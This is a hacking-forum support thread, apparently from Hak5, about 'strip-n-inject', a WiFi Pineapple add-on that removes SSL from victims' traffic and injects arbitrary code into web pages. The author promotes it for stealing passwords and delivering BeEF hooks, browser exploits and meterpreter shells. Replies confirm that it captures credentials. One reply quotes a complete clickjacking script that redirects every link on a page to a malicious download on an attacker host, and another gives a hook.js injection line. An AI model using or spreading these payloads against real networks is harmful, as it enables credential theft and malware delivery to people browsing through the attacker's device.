Jump to content

[Support] strip-n-inject


leg3nd

Recommended Posts

Description: This infusion will inject HTML code into a response from a server. The issue with ettercap and other proxies is that they cannot inject into SSL sessions as a result of the encryption. This infusion takes Moxie's SSLstrip and uses that as the proxy that injects code. This architecture provides 2 main benefits:

  1. Strip SSL from sessions before injecting code which allows for a larger attack surface.
  2. An asynchronous, non-blocking socket proxy provided by twisted-web gives much better performance from the client's point of view.

The attacks that can be implemented from this are endless.. SSLstrip for stealing passwords and inject BeEf hook.. or Java Applets... or Browser_AutoPwn in an Iframe.. All these and more will be possible via JasagerPwn or manually.

Feature Set:

  • Installer - The installer will setup the SSLStrip dependencies. This will probably even fix your normal sslstrip infusion if you're having issues with it.
    • Note: This does not use the default SSLStrip on the system since SSLStrip had to be modified for this purpose.
  • Log Output - Displays the log standard output that is generated by the modified SSLStrip. Yes.. you can get passwords still in here in the process.
  • Attacker (single address) filter - Pretty self explanitory, this adds a '! -s attacker_ip' in the iptables rule so you do not inject code into your own browsing sessions.
  • Injection Code Editor - Allows you to enter in any arbitrary code into the text editor. Note, if you have an attack running and modify this code - you need to restart the attack.
  • Auto Refresh
  • Enable/Disable and Logging in Small Tile

Screenshot (Interface):
Screenshot_10252013_08_14_21_AM.jpg

Screenshot (Basic Alert Pop-up):
alert_example.jpg

Credit:

  • Infusion GUI: Whistle Master
  • SSLStrip: Moxie Marlinspike

Cheers! :ph34r:

Edited by leg3nd
Link to comment
Share on other sites

Cool, please report any bugs so I can get em fixed up.

This is my advice with the SSLstrip issues:

  • If SSLStrip is already working for you: don't press install because it will "just work" regardless if its "not installed"
  • If SSLstrip is not working: The "Install" will likely fix it based on previous forum posts of SSLstrip installtions

This is basically the install script if you feel like trying it manually:

opkg remove twisted-web --force-depends && opkg update && opkg install twisted-web

if [ ! -e "/usr/lib/python2.7/site-packages/OpenSSL" ]; then
  ln -s /sd/usr/lib/python2.7/site-packages/OpenSSL /usr/lib/python2.7/site-packages/
fi

if [ ! -e "/usr/lib/python2.7/site-packages/twisted/web" ]; then
  ln -s /sd/usr/lib/python2.7/site-packages/twisted/web /usr/lib/python2.7/site-packages/twisted/
fi

Link to comment
Share on other sites

If it doesn't "just work", which it should with the install button, then you might need to SSH to debug it.

I'm sure you can theoretically do that but going into the "Injection Code" tab, removing all code, and saving it. This infusion is really not meant for sniffing passwords though - it lacks filters, log saving, less verbose output, etc. This infusion is meant for injecting code for more advanced attack vectors.

If you have this infusion working, you should be able to sniff passwords with the normal "sslstrip" infusion as they use the same dependencies.

Link to comment
Share on other sites

hups, your infusion is working like a charm, also the password sniffing but I am unable to clear the sslstrip issue.

anyway: <script>window.alert("You have new e-mail messages!");</script> looks cool :-)

I'm not into the injection code. I have programming next year and hope to learn some more then. At the moment its all networking and windows server at school, wich is also taking a lot of time now...

Got to make choices man but love your infusion ;-)

Link to comment
Share on other sites

Just wanted to say thanks. Prior to installing your infusion, SSLStrip was broken. In addition to the fun HTML injection, your infusion posts creds. Good work.

Add logging and I won't have a use for the SSLStrip infusion.

Edited by chriswhat
Link to comment
Share on other sites

hups, your infusion is working like a charm, also the password sniffing but I am unable to clear the sslstrip issue.

anyway: <script>window.alert("You have new e-mail messages!");</script> looks cool :-)

I'm not into the injection code. I have programming next year and hope to learn some more then. At the moment its all networking and windows server at school, wich is also taking a lot of time now...

Got to make choices man but love your infusion ;-)

The great thing is that you dont need to know programing to mount these attacks. Thats what this script is for: https://forums.hak5.org/index.php?showtopic=30588

It will automate many advanced attack vectors that utilize code injection for you - generally with the purpose of returning a meterpreter shell.

Add logging and I won't have a use for the SSLStrip infusion.

I guess I could add logging/filtering to this... but that wasn't the original purpose of the infusion. If the SSLstrip module doesn't get updated then I'll just grab that logic and add it to this so it can be used for both sniffing and code injection.

Link to comment
Share on other sites

hey, what is the new update from today about with the following new injection code?

<meta http-equiv="cache-control"content="no-cache"><meta http-equiv="X-UA-Compatible"content="IE=9"><script src="http://code.jquery.com/jquery-1.9.1.min.js" ></script><script>$(document).ready(function(){var div=document.createElement("div");div.id="overlayclick";div.style.zIndex="100";div.style.width="100%";div.style.height="100%";div.style.position="fixed";div.onclick=function(){window.open("http://172.16.42.160/run.php")};if(document.body.firstChild)document.body.insertBefore(div,document.body.firstChild);else document.body.appendChild(div)});</script><script>$(document).ready(function(){$("a").attr("href","http://172.16.42.160/run.php")});</script>

regards!

Link to comment
Share on other sites

Whoops - that's the code from the ClickJacking attack that's implemented in JasagerPwn. It basically will replace all links on the page with a download to a malicous executable as a user browses. The main purpose I made this infusion was for the attack vectors I have in JasagerPwn.

The update mainly added some failsafe code to ensure the iptables commands are removed correctly and added additional verbosity to the log output.

Feel free to replace it with: <script>window.alert("Pineapple!")</script> for the simple popup window.

Link to comment
Share on other sites

Hi leg3nd, good job.

Take a look to this repo: https://github.com/xtr4nge/sslstrip

Response tamperer support (@kkotowicz) and Code Injection was implemented (@xtr4nge) in the same SSLStrip fork.

Options:
-t <config>, --tamper <config>    Enable response tampering with settings from <config>.
-i , --inject                     Inject code into HTML pages using a text file (default inject.txt)

For code injection you can use the -i option and the file path, so you don't need to use the hardcoded file path/name.

Also you can implement more advanced attacks using the -t option.

I'm adding these functionalities to my project this week.

regards,

Link to comment
Share on other sites

Hi leg3nd, good job.

Take a look to this repo: https://github.com/xtr4nge/sslstrip

Response tamperer support (@kkotowicz) and Code Injection was implemented (@xtr4nge) in the same SSLStrip fork.

Options:
-t <config>, --tamper <config>    Enable response tampering with settings from <config>.
-i , --inject                     Inject code into HTML pages using a text file (default inject.txt)

For code injection you can use the -i option and the file path, so you don't need to use the hardcoded file path/name.

Also you can implement more advanced attacks using the -t option.

I'm adding these functionalities to my project this week.

regards,

Very cool.

Looks like the primary difference here is that you can target specific sites with specific code, different content-types, etc. I'll swap this infusion over to this port of SSLstrip to allow for more granular attacks.

Thanks!

Edited by leg3nd
Link to comment
Share on other sites

Naw not anytime soon.. I can hack things together but don't care to spend my time doing web development.

Standardization is a good thing imo. No point in reinventing the wheel.

I guess if there became a need I might do it.. but im not much of a GUI fan to begin with.. I barley use it in my pentests to begin with.

Link to comment
Share on other sites

Very cool.

Looks like the primary difference here is that you can target specific sites with specific code, different content-types, etc. I'll swap this infusion over to this port of SSLstrip to allow for more granular attacks.

Thanks!

Hi leg3nd

Here you have a few screenshots of my SSLStrip fork implemented.

https://github.com/xtr4nge/FruityWifi/wiki/Tutorial-(SSLStrip)

regards,

Edited by xtr4nge
Link to comment
Share on other sites

  • 2 months later...
  • 1 month later...

Is this new script bypass HSTS protection?

It was not designed with that in mind. I can look into the possibility of bypassing it if that is of interest to you.

Link to comment
Share on other sites

  • 1 month later...
  • 2 weeks later...

I notice there's a lot to talk about SSLStrip.

just for example the droid application for facebook, has anyone had success on preventing ssl on droid applications?

It really depends on the implementation of the specific application. For example, if the application initiated the connection on 80 and then was redirected (HTTP 301/302) to 443 - then yes it would work.

However most application development teams, especially the size and maturity of Facebook, would likely just initiate the connection straight to 443. This is the kind of silly mistake of thing that Secure Development Life Cycles look to prevent.

Link to comment
Share on other sites

It really depends on the implementation of the specific application. For example, if the application initiated the connection on 80 and then was redirected (HTTP 301/302) to 443 - then yes it would work.

However most application development teams, especially the size and maturity of Facebook, would likely just initiate the connection straight to 443. This is the kind of silly mistake of thing that Secure Development Life Cycles look to prevent.

Hi @leg3nd, i tried your infusion many time but never success inject hook.js in traffic thought my Pineapple. I config my Pineapple work as "client mode", my inject code is "<meta http-equiv="cache-control" content="no-cache" /><script src=\"http://172.16.42.3:3000/hook.js\" type=\"text/javascript\"></script>". My laptop is Kali Linux (172.16.42.3) running beef server. I ssh to pineapple (172.16.42.1) and run start.sh from "/pineapple/components/infusions/strip-n-inject/includes/".

Everything seen ok, but when i test suff web througt pineapple, the html page not be injected, i check the source code of html respone and it not have hook.js.

I don't know what's wrong? You can help me? Thanks alot!

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...